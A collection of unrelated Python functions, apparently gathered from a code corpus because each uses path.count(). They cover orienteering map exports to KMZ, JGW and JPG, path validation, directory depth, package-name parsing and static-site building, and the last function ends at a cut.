def createJGW(path): import tempfile EPSG900913 = "+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs +over" S2P = 360.0 / 0.127 MAP_NM = 0.014 MAP_EM = 0.008 MAP_SM = 0.013 MAP_WM = 0.008 if path.count("|") < 9 or path.count("|") > 10 or len(path) < 30: return "Incorrectly formatted string." if path.count("|") == 9: path = path + "|" style, paper, scale, centre, title, club, mapid, start, crosses, cps, controls = path.split( "|") style = style.split("=")[1] paper = paper.split("=")[1] PAPER_W = float(paper.split(",")[0]) PAPER_H = float(paper.split(",")[1]) scale = int(scale.split("=")[1]) centre = centre.split("=")[1] clat = int(centre.split(",")[0]) clon = int(centre.split(",")[1]) projection = mapnik.Projection(EPSG900913) wgs84lat = mapnik.Coord(clon, clat).inverse(projection).y scaleCorrectionFactor = math.cos(wgs84lat * math.pi / 180) scaleCorrected = scale / scaleCorrectionFactor if style == "adhoc": MAP_EM = MAP_WM MAP_NM = MAP_WM MAP_SM = MAP_WM MAP_W = PAPER_W - MAP_WM - MAP_EM MAP_H = PAPER_H - MAP_NM - MAP_SM paperSLat = clat - (MAP_H / 2 + MAP_SM) * scaleCorrected paperNLat = clat + (MAP_H / 2 + MAP_NM) * scaleCorrected paperWLon = clon - (MAP_W / 2 + MAP_WM) * scaleCorrected paperELon = clon + (MAP_W / 2 + MAP_EM) * scaleCorrected PIXEL_W = PAPER_W * S2P PIXEL_H = PAPER_H * S2P fworld = tempfile.NamedTemporaryFile() fworld.write(str((paperELon - paperWLon) / PIXEL_W) + "\n") fworld.write(str(0) + "\n") fworld.write(str(0) + "\n") fworld.write(str((paperSLat - paperNLat) / PIXEL_H) + "\n") fworld.write(str(paperWLon) + "\n") fworld.write(str(paperNLat) + "\n") fworld.seek(0) return fworld
def processRequest(req): from mod_python import apache, util path = req.args with open(home + "/logs/oommakerlog-kmz-access.txt", "a") as fa: fa.write(time.strftime('%x %X') + " : " + req.get_remote_host() + " : " + path + "\n") outf = createKMZ(path) if path.count("|") < 9 or path.count("|") > 10 or len(path) < 30: return "Incorrectly formatted string." if path.count("|") == 9: path = path + "|" style, paper, scale, centre, title, club, mapid, start, crosses, cps, controls = path.split("|") mapid = mapid.split("=")[1] if isStr(outf): req.status = apache.HTTP_SERVICE_UNAVAILABLE req.content_type = 'text/html' outHTML = "<html><head><title>OpenOrienteeringMap: Error</title></head><body><h1>Error</h1><p>" + outf + "</p></body></html>" req.write(outHTML) with open(home + "/logs/oommakerlog-kmz-error.txt", "a") as fe: fe.write(time.strftime('%x %X') + " : " + req.get_remote_host() + " : " + outf + " : " + path + "\n") return req else: outfsize = os.fstat(outf.fileno()).st_size req.status = apache.HTTP_OK req.content_type = 'application/vnd.google-earth.kmz' req.headers_out["Content-Disposition"] = "attachment; filename=\"oom_" + mapid + ".kmz\"" req.set_content_length(outfsize) req.write(outf.read()) return req
def processRequest(req): from mod_python import apache, util path = req.args with open(home + "/logs/oommakerlog-jgw-access.txt", "a") as fa: fa.write(time.strftime('%x %X') + " : " + req.get_remote_host() + " : " + path + "\n") outf = createJPG(path) if path.count("|") < 8 or path.count("|") > 9 or len(path) < 30: return "Incorrectly formatted string." if path.count("|") == 8: path = path + "|" style, paper, scale, centre, title, club, mapid, start, crosses, controls = path.split("|") mapid = mapid.split("=")[1] if isStr(outf): req.status = apache.HTTP_SERVICE_UNAVAILABLE req.content_type = 'text/html' outHTML = "<html><head><title>OpenOrienteeringMap: Error</title></head><body><h1>Error</h1><p>" + outf + "</p></body></html>" req.write(outHTML) with open(home + "/logs/oommakerlog-jgw-error.txt", "a") as fe: fe.write(time.strftime('%x %X') + " : " + req.get_remote_host() + " : " + outf + " : " + path + "\n") return req else: outfsize = os.fstat(outf.fileno()).st_size req.status = apache.HTTP_OK req.content_type = 'text/plain' req.headers_out["Content-Disposition"] = "attachment; filename=\"oom_" + mapid +".jgw\"" req.set_content_length(outfsize) req.write(outf.read()) return req
def illegalPath(path): # Illegal characters in path? legal = ['.',',','-','_','"',"'",'(',')','/', '[', ']'] punctuation = string.punctuation for b in legal: punctuation = punctuation.replace(b, '') ok = True not in [p in string.whitespace for p in path] # no whitespace chars ok = ok and (False not in [p in string.printable for p in path]) # must only contain printable chars ok = ok and (True not in [p in punctuation for p in path]) # must not contain punctuation chars ok = ok and (path.count('text()')==path.count('(') and path.count('text()')==path.count(')')) if not ok: return (True, "Illegal characters found in %s" % path) # Badly constructed path? bad = path.count('text()') > 1 or ('text()' in path and not path.endswith('text()')) if bad: return (True, "%s: Illegally placed 'text()'." % path) # Bad use of selectors in path? selectors = getSelectors(path, True) # get only attribute selectors i.e. a['hello'], rather than, say, a[9] if selectors: bad = len(selectors) > 1 bad = bad or (selectors[0] not in path.split('/')[-1]) # bad = selector not at end of path bad = bad or (False in [a[0]=='/' for a in path.split(']')[1:] if a]) # bad = selector not followed by '/' or end of path bad = bad or (not isAttrSelector(selectors[0]) and not isIndexSelector(selectors[0])) if bad: return (True, "%s: Illegally placed attribute selector(s)." % path) # All ok return (False, "")
def get_deepth(path): plat_sys = platform.system() deepth = 0 if plat_sys == "Windows": path = path.strip("\\") deepth = path.count("\\") + 1 elif plat_sys == "Linux": path = path.strip("/") deepth = path.count("/") + 1 return deepth
def _probably_filename(path): if len(path) > PATH_SIZE_LIMIT: return False elif os.path.exists(path): return True elif path.count('. ') >= 3 or path.count('\n') >= 3 or path.count(', ') >= 3: return False elif max(len(filename) for filename in path.split('/')) > FILENAME_SIZE_LIMIT: return False else: return True
def mtimelevel(path, level): mtime = os.stat(path).st_mtime for dirpath, dirnames, _ in walklevel(path, level): dirlist = [os.path.join("/", dirpath, d) for d in dirnames if level == -1 or dirpath.count(os.path.sep) - path.count(os.path.sep) <= level] mtime = max(mtime, max([-1] + [os.stat(d).st_mtime for d in dirlist])) return mtime
def pop_path_rev(path2): '''if path is hello/world then this would return hello''' path = copy.copy(path2) if path.count("/") == 0: return "" pieces = string.split(path, "/") pieces.reverse() return pieces.pop()
def build_respath(path, sep=os.path.sep, bw=".."): """ build the resource path back to root and returns resource data or F """ # check for os.path.altsep in path & die # as it gives unpredictable result if not path.count(os.path.altsep) > 0: if path: resdata = "" # because counting b/w path count = path.count(sep) + 1 for c in range(0, count): resdata = "%s%s%s" % (resdata, bw, sep) return resdata return False
def createSurveyList(tree, startinglevel, depth): """ Function which create a list of tupples form by (fileName, dateOfLastModif) corresponding to the files in the tree :param tree: tree :type tree: list :param startinglevel: starting level to compute the current depth :type startinglevel: int :param depth: depth of supervision :type depth: int :return listOfModifFiles: list for he deleted files :rtype listOfModifFiles: list """ listOfModifFiles = [] i = 0 while (i < len(tree)): path, dirs, files = tree[i] level = path.count(os.sep) - startinglevel if (level <= depth): for dir in dirs: modifTime = os.path.getmtime(os.path.join(path, dir)) listOfModifFiles += [(path + '/' + dir, modifTime)] for file in files: modifTime = os.path.getmtime(os.path.join(path, file)) listOfModifFiles += [(path + '/' + file, modifTime)] i += 1 return (listOfModifFiles)
def process(jinja, path): try: headers, content = util.read_header_file(path) except: print "when processing '%s':" % path raise html = markdown.markdown(content.decode('utf-8'), extensions=['smarty'], extension_configs={ 'smarty': { 'smart_quotes': False, 'smart_ellipses': False, 'substitutions': { 'ndash': '—', }, } }).encode('utf-8') attrs = { 'content': html, 'root': '../' * (path.count('/') - 1), } attrs.update(headers) output = jinja.get_template('page.tmpl').render(**attrs) output_path = os.path.splitext(path)[0] + '.html' util.write_if_changed(output_path, output)
def print_channel_structure(xmlcontent): """ print out xml tree structure using algorithm from stackoverflow.com """ # xml_root = etree.fromstring(xmlcontent) raw_tree = etree.ElementTree(xml_root) nice_tree = collections.OrderedDict() for tag in xml_root.iter(): path = re.sub(r"\[[0-9]+\]", "", raw_tree.getpath(tag)) if path not in nice_tree: nice_tree[path] = [] if tag.keys(): nice_tree[path].extend( attrib for attrib in tag.keys() if attrib not in nice_tree[path] ) for path, attribs in nice_tree.items(): indent = int(path.count("/") - 1) print( "{0}{1}: {2} [{3}]".format( " " * indent, indent, path.split("/")[-1], ", ".join(attribs) if attribs else "-", ) )
def getDepth(path): """ Return the depth of a given path, zero-based from root ('/') """ if path == '/': return 0 else: return path.count('/')
def listdir(self, dirname, walk=False, owner=None, limit=0, open_files=False, delimiter=u'/', rev=None, start_file=None, **kwargs): if delimiter: nd = os.path.normpath(dirname) if dirname.endswith(delimiter) and not nd.endswith(delimiter): nd += delimiter dirname = nd count = 0 start = self._make_file_key(dirname)[:-1] end = start + b'\xff' if start_file: start = self._make_file_key(start_file) nc = dirname.count(delimiter) unpack = self._files.unpack with self._begin(buffers=True) as tr, closing(tr.get_range(start, end)) as kr: for k, v in kr: k = unpack(k)[0] path = u'/' + u'/'.join(k) if not walk and path.count(delimiter) > nc: continue finfo = FileInfo.from_bytes(v) if finfo.flag == OP_DELETED: continue elif owner and not self.check_perm( path, owner=owner, raise_exception=False, tr=tr): continue if not finfo.history_key: finfo.history_key = self.make_history_key(path) hist = self._get_history_for_rev(tr, path, finfo.history_key, rev or finfo.rev) meta = ListInfo.from_records(hist, finfo) meta.path = path if open_files: yield VersionedFile(self, path, mode=Perm.read, requestor=owner, file_info=meta) else: yield meta if limit: count += 1 if count == limit: break
def init(path): if path.count('/') != 1: raise OSError('%r should contain exactly one slash' % path) ret = lib.GC_init(path) if not ret: raise OSError('Failed to initialized the shm GC') # if init.gc_info is None: init.gc_info = allocate_gc_info(path) # to keep it alive
def getDepth(path): """ Return the depth of a given path, zero-based from root ('/') """ logger.debug("getDepth: %s", path) if path == '/': return 0 return path.count('/')
def traverse(source_path, process): """Traverse folder structure from source_path and apply process function to each step. Parameters: ------ source_path: path to traverse process: function (level, root, dirs, files) Returns: actions: list of actions """ patterns = read_gitignore(source_path) level = lambda path: path.count("\\") + path.count("/") base_level = level(source_path) actions = [] for root, dirs, files in os.walk(source_path): remove_ignored(dirs, patterns, is_dir=True) remove_ignored(files, patterns) actions.extend(process(level(root) - base_level, root, dirs, files)) return actions
def iterfind(self, path=None, namespaces=None): """XML resource tree iterfind selector.""" if not self._lazy: if path is None: yield self._root else: for e in iter_select(self._root, path, namespaces, strict=False): yield e return elif self.seek(0) == 0: resource = self.source elif self._url is not None: resource = urlopen(self._url, timeout=self.timeout) else: self.load() resource = StringIO(self._text) try: if path is None: level = 0 for event, elem in self.iterparse(resource, events=('start', 'end')): if event == "start": if level == 0: self._root.clear() self._root = elem level += 1 else: level -= 1 if level == 0: yield elem elem.clear() else: selector = Selector(path, namespaces, strict=False, parser=XmlResourceXPathParser) path = path.replace(' ', '').replace('./', '') path_level = path.count('/') + 1 if path != '.' else 0 select_all = '*' in path and set(path).issubset({'*', '/'}) level = 0 for event, elem in self.iterparse(resource, events=('start', 'end')): if event == "start": if level == 0: self._root.clear() self._root = elem level += 1 else: level -= 1 if level == path_level and \ (select_all or elem in selector.select(self._root)): yield elem elem.clear() elif level == 0: elem.clear() finally: if self.source is not resource: resource.close()
def get_path_from_sys(i): slash = 0 path_list = [] while (slash < 7): path_list.append(arg_list[i]) path = ''.join(path_list) if path[-1:] != '/': path_list.append(' ') slash = path.count("/") i += 1 return path, i
def next_node(graph, node, small_cave, all_paths, path=None): if path is None: path = [] path.append(node) for n in graph[node]: if n == 'end': path.append(n) all_paths.append(path) elif not (is_small(n) and n in path) or n == small_cave and path.count(n) < 2: next_node(graph, n, small_cave, all_paths, path.copy())
def calcRelativePathToTop(self, path): count = path.count(os.path.sep) - self.top.count(os.path.sep) - 1 print("log:",path,count) rpath=None for i in range(0, count): if None is not rpath: rpath = rpath + "/.." else: rpath = ".." if rpath is None: rpath = "." return rpath
def extract_name(path): if path[-1] == '/': path = path[:-1] path = path.replace('copy', '') path = path.replace('.tif', '') path = path.replace(' ', '') num_slash = path.count('/') path = path.replace('/', '', num_slash - 1) lslash_index = path.index('/') name = path[lslash_index + 1:] return name
def common_prefixes(self, prefix, delimiter): start = self._make_file_key(prefix)[:-1] end = start + b'\xff' nc = prefix.count(delimiter) pref = collections.defaultdict(int) with self._begin() as tr: for k, v in tr.get_range(start, end): k = self._files.unpack(k)[0] path = u'/' + u'/'.join(k) path = path.replace(prefix, '', 1) if path != prefix and path.count(delimiter) == 1: pref[path.split(delimiter)[0]] += 1 return pref.items()
def open_readonly(path): if path.count('/') != 1: raise OSError('%r should contain exactly one slash' % path) ret = lib.GC_open(path) if not ret: raise OSError('Failed to open the shm GC') # # sanity check gc_info = get_gc_info() if gc_info.magic != GC_INFO_MAGIC: raise ValueError("The gc_info global does not seem to be at the address 0x%x, " "or it has been corrupted" % GC_INFO_ADDRESS) # # now, we need to enable writing to the RW part of the memory protect_GC_memory(lib.PROT_READ)
def build_respath(path, bw="..", is_web=True): """ build the resource path back to root from existing path and return resource path data or F """ # check for os.path.altsep in path & die # as it gives unpredictable result if not path.count(os.path.altsep) > 0: if path: if is_web: sep = "/" else: sep = os.path.sep resdata = "" # because counting b/w path count = path.count(os.path.sep) + 1 for c in range(0, count): resdata = "%s%s%s" % (resdata, bw, sep) if is_web: if count > 1: resdata = resdata[:-1] return resdata return False
def walk_level(path, level=-1): """Similar to os.walk function but with yielding current level from 'path'. Argument 'level' -- how deep the recusion will go (if less than 0 then there is no limit). from: http://stackoverflow.com/a/234329 """ num_sep = path.count(os.sep) for root, dirnames, filenames in os.walk(path): cur_level = root.count(os.sep) - num_sep yield root, dirnames, filenames, cur_level if level >= 0 and cur_level >= level: # it omits directories under some level # you can read about this trick in python docs del dirnames[:]
def __init__(self, path = None, run = None): assert (path is not None) or (run is not None) if path is not None: if path.count('/') == 0: run, path = path, run if run is not None: if run.count('/') != 0: run, path = path, run if path is not None: path = os.path.abspath(os.path.expanduser(os.path.expandvars(path))) else: path = os.path.join(default_path, run) if run is None: run = os.path.basename(path) self.path = path self.run = run self.dumps = dict()
def guess_pkgname_and_version(path): path = os.path.basename(path) if path.endswith(".whl"): return _guess_pkgname_and_version_wheel(path) path = _archive_suffix_rx.sub('', path) if '-' not in path: pkgname, version = path, '' elif path.count('-') == 1: pkgname, version = path.split('-', 1) elif '.' not in path: pkgname, version = path.rsplit('-', 1) else: parts = re.split(r'-(?=(?i)v?\d+[\.a-z])', path) pkgname = '-'.join(parts[:-1]) version = parts[-1] return pkgname, version
def __find_in_path(path, term, max_depth=10): """Find file under path. """ found = [] path_slash_count = path.count("/") for root, dirnames, filenames in os.walk(path): if max_depth and root.count("/") - path_slash_count >= max_depth: del dirnames[:] continue # TODO: limit to file|dir|both filenames = fnmatch.filter(filenames, term) found.extend([os.path.join(root, filename) for filename in filenames]) dirnames = [dirname + "/" for dirname in dirnames] dirnames = fnmatch.filter(dirnames, term) found.extend([os.path.join(root, dirname) for dirname in dirnames]) return sorted(found)
def __init__(self, name, namespaces, base_uri, attrs): self._parent = None self.name = name self.namespaces = namespaces self.base_uri = base_uri self.attrs = attrs self._children = [] if "datatypeLibrary" in self.attrs: library = self.attrs["datatypeLibrary"] if library != "": lib_parts = urlparse(library) path = lib_parts[2] num_percent = path.count("%") path_unquote = urllib.parse.unquote(path) valid = len(path) == len(path_unquote) + 2 * num_percent if lib_parts[0] == "" or path == "" or not valid or lib_parts[5] != "": raise PrangException( "The 'datatypeLibrary' attribute must be an absolute " "URI. The value of the attribute is '" + library + "'." ) if self.name == "element": actual = set(self.attrs.keys()) allowed = set(("name", "ns", "datatypeLibrary")) if actual > allowed: raise PrangException( "An 'element' element's attribute names must be a subset " "of " + str(allowed) + ". The actual attributes are " + str(actual) ) if "name" in self.attrs: validate_qname(self.attrs["name"].strip()) if self.name == "attribute": if "name" in self.attrs: validate_qname(self.attrs["name"].strip()) if self.name == "ref": if "name" in self.attrs: validate_ncname(self.attrs["name"].strip()) if self.name == "define": if "name" in self.attrs: validate_ncname(self.attrs["name"].strip()) if "href" in self.attrs: if urllib.parse.urlparse(self.attrs["href"]).fragment != "": raise PrangException("The href attribute can't contain a URI with a fragment " "identifier.")
def __init__(self, path=None, run=None): assert (path is not None) or (run is not None) if path is not None: if path.count('/') == 0: run, path = path, run if run is not None: if run.count('/') != 0: run, path = path, run if path is not None: path = os.path.abspath(os.path.expanduser( os.path.expandvars(path))) else: path = os.path.join(default_path, run) if run is None: run = os.path.basename(path) self.path = path self.run = run self.dumps = dict()
def hasExtension(path): """Query if the last part of a path has a file extension. A file extension is any part after the last dot inclusively. @param path: The path to check. @type path: string @return: True if the path has an extension, otherwise False. @rtype: bool """ end = path.rfind("\\") end = max(path.rfind("/", end + 1), end) + 1 # We search in the substring AFTER the last slash. # In the case that a slash is not found, the -1 returned by rfind becomes zero, # and so searches the whole string extStart = path.rfind(".", end) return extStart > end and path.count(".", end, extStart) != extStart - end
def process(default_template, path): try: headers, content = util.read_header_file(path) except: print "when processing '%s':" % path raise mtime = time.localtime(os.path.getmtime(path)) attrs = {'content': markdown.markdown(content), 'lastupdate': time.strftime('%Y-%m-%d', mtime), 'root': '../' * (path.count('/') - 1)} attrs.update(headers) output = default_template.evaluate(attrs) output_path = os.path.splitext(path)[0] + '.html' util.write_if_changed(output_path, output)
def remove_mez(message, collected, updates): # remove existing path = message.message[len(MEZ_BEGIN) + 1:] category, title = path.split('/') if path.count('/') == 1 else ('የምስጋና', path) if category in collected['data']: if title in collected['data'][category]['data']: cat_info = collected['data'][category] sender = cat_info['data'][title]['sender'] updates[title] = {'type': 'remove', 'sender': sender} # update counts collected['count_eng'] -= 1 if cat_info['count_eng'] == 1: # if it is the last of its kind del collected['data'][category] else: cat_info['count_eng'] -= 1 cat_info['count'] = geez_num(cat_info['count_eng']) del cat_info['data'][title] return collected, updates
def stripExtension(path): """Return the part of the path before the extension. @param path: The path to split. @type path: string @return: The part of the path before the extension. @rtype: string """ end = path.rfind("\\") end = max(path.rfind("/", end + 1), end) + 1 # We search in the substring AFTER the last slash. # In the case that a slash is not found, the -1 returned by rfind becomes zero, # and so searches the whole string extStart = path.rfind(".", end) if extStart > end and path.count(".", end, extStart) != extStart - end: return path[:extStart] else: return path
def savePath(): try: path = pa.SaveDialog(msgDict["SaveDialog"], "", "~/") if path is None: return None # trying to add ".shp" to the end of the path if it is not included path = path.strip() if path.rfind(".shp") != (len(path) - len(".shp")): if path.rfind(".") != (len(path) - 1): path += ".shp" else: path += "shp" if path.count(".") > 1: pa.MessageBox(msgDict["FileNameErr"], "Error") return None return path except Exception as e: printErrorMessage(e) return None
def savePath(): try: path = pa.SaveDialog(msgDict["SaveDialog"], "", "~/") if path is None: return None # trying to add ".shp" to the end of the path if it is not included path = path.strip() if path.rfind(".shp") != (len(path) - len(".shp")): if path.rfind(".") != (len(path) -1): path += ".shp" else: path += "shp" if path.count(".") > 1: pa.MessageBox(msgDict["FileNameErr"], "Error") return None return path except Exception as e: printErrorMessage(e) return None
def execute(self): self.display( OUTPUT_DEBUG, 'deploy task execuiting under %s' % self._root ) rmtree( self._root + '/', ignore_errors=True ) system( 'mkdir -p %s/' % self._root ) if not self.pid in self.node._procs: self.display( OUTPUT_DEBUG, 'adding process to node list' ) self.node._procs[ self.pid ] = self._root if 'general' in self._config and 'localresources' in self._config['general']: self.display( OUTPUT_DEBUG, 'setting up local resources' ) cwd = getcwd() chdir( self._root ) fname = '%s.tar.gz' % self._root system( 'tar zxf %s' % fname ) #tf = TarFile.open( self._root + '.tar.gz' ) #tf.extractall( self._root + '/' ) #tf.close() chdir( cwd ) remove( self._root + '.tar.gz' ) if 'modulepath' in self._config['general']: files = listdir( self._root + '/' + self._config['general']['modulepath'] ) for f in files: if f.endswith( '.py' ): move( self._root + '/' + self._config['general']['modulepath'] + '/' + f, self._root ) if path.count( self._root ) == 0: path.append( self._root ) self.display( OUTPUT_DEBUG, 'process %d resources deployed.' % self.owner ) self._config = None self.state = SUCCESS
def run(self): startinglevel = self.path.count(os.sep) for path, dirs, files in os.walk(self.path): if self.stop_event.is_set(): self.logger.error("Program unexpectedly aborted...exiting thread") return depth = path.count(os.sep) - startinglevel node = Node(path, depth, dirs, files) self.logger.debug(node.path) self.logger.debug(node.depth) self.logger.debug(node.dirs) self.logger.debug(node.files) self.data_queue.put(node) self.logger.debug("%s::%s - Items in queue %d", self.__class__.__name__, self.getName(), self.data_queue.qsize()) self.logger.info(" %s::%s is finished", self.__class__.__name__, self.getName()) # Object that signals shutdown _sentinel = None self.data_queue.put(_sentinel)
def extension(path): """Get the file extension of the last part of a path. A file extension is any part after the last dot inclusively. @param path: The path to split. @type path: string @return: The extension part of the path. @rtype: string """ end = path.rfind("\\") end = max(path.rfind("/", end + 1), end) + 1 # We search in the substring AFTER the last slash. # In the case that a slash is not found, the -1 returned by rfind becomes zero, # and so searches the whole string extStart = path.rfind(".", end) if extStart > end and path.count(".", end, extStart) != extStart - end: return path[extStart:] else: return ""
def guess_pkgname_and_version(path): path = os.path.basename(path) if path.endswith(".asc"): path = path.rstrip(".asc") if path.endswith(".whl"): return _guess_pkgname_and_version_wheel(path) if not _archive_suffix_rx.search(path): return path = _archive_suffix_rx.sub('', path) if '-' not in path: pkgname, version = path, '' elif path.count('-') == 1: pkgname, version = path.split('-', 1) elif '.' not in path: pkgname, version = path.rsplit('-', 1) else: pkgname = _pkgname_re.split(path)[0] ver_spec = path[len(pkgname) + 1:] parts = _pkgname_parts_re.split(ver_spec) version = parts[0] return pkgname, version
def view(request,path="",sha="master"): ''' view the path/file/page at a given commit note: if it's a folder, return the index view. ''' #check if the path is a path or if the path is a file if path: if not path_is_file(path=path,sha=sha): return index(request,path=path,sha=sha) repo = git.Repo(settings.REPO_DIR) commits = repo.commits(start=sha,max_count=1) head = commits[0] files = head.tree.items() returncontents = "" stop = False cur_tree = head.tree while not stop: check = False name = cur_tree.name if not name: name = "" #or "/" if path.count("/") == 0: #check = cur_tree.__dict__["_contents"].has_key(path) check2 = (cur_tree.keys()).count(path) #is "path" a file in this tree? if check2 == 0: check = False #path is not a file in this tree else: check = True #ok, it is checkthing = path #in the case of a file, checkthing needs to be the path else: if not hasattr(cur_tree.__dict__["_contents"], "has_key"): raise Http404() check = cur_tree.__dict__["_contents"].has_key(pop_path_rev(copy.copy(path))) # checkthing = pop_path_rev(path) #in the case of a folder, checkthing needs to be the remaining path as we travel down the rabbit hole if check and not name == checkthing: #we don't have what we want, and it's a valid key, so let's setup the next step in the while loop cur_tree = cur_tree[checkthing] path = pop_path(path) if type(cur_tree) == git.blob.Blob: stop = True #stop if we have our file (by definition we can't go deeper anyway) elif name == checkthing: stop = True #we have what we want, let's roll. if type(cur_tree) == git.blob.Blob: returncontents = cur_tree.data return django.shortcuts.render_to_response("view.html", locals())
def _iquestw(path, orig_path): "expands SQL wildcards in path by querying the catalog" path_slashes = path.count("/") def _filter(e): ret = [] # empty result if "CAT_NO_ROWS_FOUND" in e: return [] # remove query results which contain more "/" characters than the original query # because they aren't on the same collection depth we asked for p in e.strip().split("\n"): if p.count("/") == path_slashes: ret.append(p) return ret iquest = IrodsCommand("iquest", ["--no-page"], output_filter = _filter, verbose = False) coll, name = os.path.split(path) files = [] # look for data objects (files) if not path.endswith("/"): _returncode, files = iquest( ["%s/%s", "select COLL_NAME, DATA_NAME where COLL_NAME like '%s' AND DATA_NAME like '%s'" % ( coll, name )] ) # look for collections (directories) if path.endswith("/"): path = path[:-1] path_slashes -= 1 _returncode, collections = iquest( ["%s", "select COLL_NAME where COLL_NAME like '%s' " % ( path, )] ) return (files + collections) or [orig_path]
def _find(self, path): if any(path.endswith(ext) for ext in HIDDEN_EXTS): return None if path.startswith('/'): path = path[1:] if path == '': path = 'index' # use urljoin, since it preserves the trailing / # that may be a part of path; since self.app_dir # was abspath'd, we must unconditionally add a # trailing slash to *it*, since the second arg # to urljoin is treated relative to the first fspath = urlparse.urljoin(self.app_dir + '/', path) # first: see if an exact match exists if os.path.isfile(fspath): filename = os.path.basename(fspath) if any(filename.startswith(pre) for pre in HIDDEN_PREFIXES): return None return file(fspath, 'rb') # next: see if an exact path match with # extension ".ks" exists, and load template fspath += '.ks' if os.path.isfile(fspath): return self.engine.get_template(path + '.ks') # finally: see if a parameterized path matches # the request path. candidates = [] pathparts = path.split('/') pathdepth = path.count('/') for dirpath, dirnames, filenames in os.walk(self.app_dir): dirpath = dirpath[len(self.app_dir):] depth = dirpath.count('/') for dirname in list(dirnames): if dirname == pathparts[depth]: continue if dirname.startswith('%'): continue dirnames.remove(dirname) if pathdepth == depth: dirpath = dirpath.lstrip('/') for filename in filenames: if filename.startswith('%'): candidates.append(os.path.join(dirpath, filename)) elif filename.endswith('.ks'): if pathparts[-1] == '' and filename == 'index.ks' or \ filename == pathparts[-1] + '.ks': candidates.append(os.path.join(dirpath, filename)) elif filename == pathparts[-1]: candidates.append(os.path.join(dirpath, filename)) if not candidates: return None scores = self._score_candidates(path, candidates) maxscore = max(scores) candidates = [c for c, s in izip(candidates, scores) if s == maxscore] if len(candidates) > 1: # choose the first one alphabetically; # this is arbitrary, but consistent candidates.sort() warnings.warn( 'Multiple parameterized paths matched: %r, choosing %r' % (candidates, candidates[0])) winner = candidates[0] if not winner.endswith('.ks'): # we've matched a static file with a wildcard # path, so just return a file object on it fspath = os.path.join(self.app_dir, winner) return file(fspath, 'rb') urlparams = {} for pathpart, urlpart in izip(path.split('/'), winner.split('/')): if urlpart.startswith('%'): name = urlpart[1:] if name.endswith('.ks'): name = name[:-3] urlparams[name] = pathpart template = self.engine.get_template(winner).copy() template.urlparams = urlparams return template
def createKMZ(path): import tempfile import zipfile from handlePDF import createImage from simplekml import Kml, Folder from simplekml.base import Kmlable class PermKml(Kml): def savekmz(self, path, format=True): Kmlable._currentroot = self self._outputkmz = True out = self._genkml(format).encode('utf-8') kmz = zipfile.ZipFile(path, 'w', zipfile.ZIP_DEFLATED) info = zipfile.ZipInfo("doc.kml") info.external_attr = 0100775 << 16 info.date_time = time.localtime() kmz.writestr(info, out) for image in self._images: kmz.write(image, os.path.join('files', os.path.split(image)[1])) for image in self._foundimages: kmz.write(image, os.path.join('files', os.path.split(image)[1])) kmz.close() jpgf = createImage(path, 'jpg', 2) global MAP_NM, MAP_EM, MAP_SM, MAP_WM if path.count("|") < 9 or path.count("|") > 10 or len(path) < 30: return "Incorrectly formatted string." if path.count("|") == 9: path = path + "|" style, paper, scale, centre, title, club, mapid, start, crosses, cps, controls = path.split("|") paper = paper.split("=")[1] PAPER_W = float(paper.split(",")[0]) PAPER_H = float(paper.split(",")[1]) scale = int(scale.split("=")[1]) centre = centre.split("=")[1] clat = int(centre.split(",")[0]) clon = int(centre.split(",")[1]) projection = mapnik.Projection(EPSG900913) wgs84lat = mapnik.Coord(clon, clat).inverse(projection).y scaleCorrectionFactor = math.cos(wgs84lat * math.pi/180) scaleCorrected = scale / scaleCorrectionFactor MAP_W = PAPER_W - MAP_WM - MAP_EM MAP_H = PAPER_H - MAP_NM - MAP_SM paperSLat = clat - (MAP_H/2+MAP_SM)*scaleCorrected paperNLat = clat + (MAP_H/2+MAP_NM)*scaleCorrected paperWLon = clon - (MAP_W/2+MAP_WM)*scaleCorrected paperELon = clon + (MAP_W/2+MAP_EM)*scaleCorrected XMin = clon - (paperELon - paperWLon)/2.0 YMin = clat - (paperNLat - paperSLat)/2.0 XMax = clon + (paperELon - paperWLon)/2.0 YMax = clat + (paperNLat - paperSLat)/2.0 north = mapnik.Coord(XMin, YMax).inverse(projection).y west = mapnik.Coord(XMin, YMax).inverse(projection).x south = mapnik.Coord(XMax, YMin).inverse(projection).y east = mapnik.Coord(XMax, YMin).inverse(projection).x kml = PermKml() kml.document = Folder(name="") jpgfilename = '/tmp/tile_0_0.jpg' jpgfile = open(jpgfilename, 'wb') jpgfile.write(jpgf.read()) jpgfile.flush() jpgfilepath = kml.addfile(jpgfilename) ground = kml.newgroundoverlay(name=os.path.split(jpgfilename)[1]) ground.draworder = 75 ground.icon.href = jpgfilepath ground.icon.viewboundscale = 0.75 ground.latlonbox.north = north ground.latlonbox.south = south ground.latlonbox.east = east ground.latlonbox.west = west ground.latlonbox.rotation = 0 kmzfile = tempfile.NamedTemporaryFile() kml.savekmz(kmzfile.name) return kmzfile
def createJPG(path): import tempfile import cairo import urllib from PIL import Image # Specifically declare these as global, as we may change them. global MAP_NM, MAP_EM, MAP_SM, MAP_WM if path.count("|") < 8 or path.count("|") > 9 or len(path) < 30: return "Incorrectly formatted string." if path.count("|") == 8: path = path + "|" style, paper, scale, centre, title, club, mapid, start, crosses, controls = path.split("|") style = style.split("=")[1] if style != "crew" and style != 'blueprint' and style != "urban_skeleton" and style != "streeto" and style != "oterrain" and style != "streeto_norail" and style != "adhoc" and style != "streeto_ioa" and style != "oterrain_ioa" and style != "streeto_norail_ioa" and style != 'streeto_global' and style != 'streeto_norail_global' and style != 'oterrain_global': return "Unknown style." paper = paper.split("=")[1] PAPER_W = float(paper.split(",")[0]) PAPER_H = float(paper.split(",")[1]) scale = int(scale.split("=")[1]) centre = centre.split("=")[1] clat = int(centre.split(",")[0]) clon = int(centre.split(",")[1]) title = title.split("=")[1] slon = 0 slat = 0 start = start.split("=")[1] if len(start) > 0: slat = int(start.split(",")[0]) slon = int(start.split(",")[1]) controlsArr = [] controls = controls.split("=")[1] if len(controls) > 0: controlsArr = controls.split(",") crossesArr = [] crosses = crosses.split("=")[1] if len(crosses) > 0: crossesArr = crosses.split(",") if mapid != "": mapid = mapid.split("=")[1] projection = mapnik.Projection(EPSG900913) wgs84lat = mapnik.Coord(clon, clat).inverse(projection).y scaleCorrectionFactor = math.cos(wgs84lat * math.pi/180) scaleCorrected = scale / scaleCorrectionFactor if style == "adhoc": MAP_EM = MAP_WM MAP_NM = MAP_WM MAP_SM = MAP_WM MAP_W = PAPER_W - MAP_WM - MAP_EM MAP_H = PAPER_H - 